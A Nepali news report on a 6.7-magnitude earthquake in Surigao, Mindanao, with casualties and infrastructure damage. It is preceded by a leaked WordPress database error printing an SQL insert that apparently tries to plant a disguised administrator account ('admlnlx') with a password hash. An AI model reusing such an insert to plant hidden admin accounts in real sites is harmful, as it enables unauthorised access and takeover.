WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BE.ve73f5KCR02Dto66S2iFR5E/wc/.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 07:01:58', '', 'admlnlx', 'admlnlx')
काठमाडौं, माघ २९ –
फिलिपिन्सको दक्षिणी मिन्दानाओ टापुको सुरिगाओ सहरमा गएको ६.७ म्याग्निच्यूडको भूकम्पका कारण कम्तीमा चारजनाको मृत्यु भएको छ भने १०० जनाभन्दा बढी घाइते भएका छन् ।
शुक्रबार गएको भूकम्पमा कारण भवनहरु भत्किएका छन् भने खानेपानी र विद्युत् सेवा अवरुद्ध भएको छ । सहरमा रहेको विमानस्थलको धावनमार्ग भत्किएकाले हवाई उडान स्थगित गरिएको छ ।
भूकम्पको केन्द्रबिन्दू जमिनबाट १० किलोमिटर तल रहेको अमेरिकी भूगर्भ विभागले जनाएको छ ।
भूकम्पपछि ९० भन्दा बढी पराकम्पनको धक्का महसुस गरिएको जनाइएको छ । (एजेन्सी)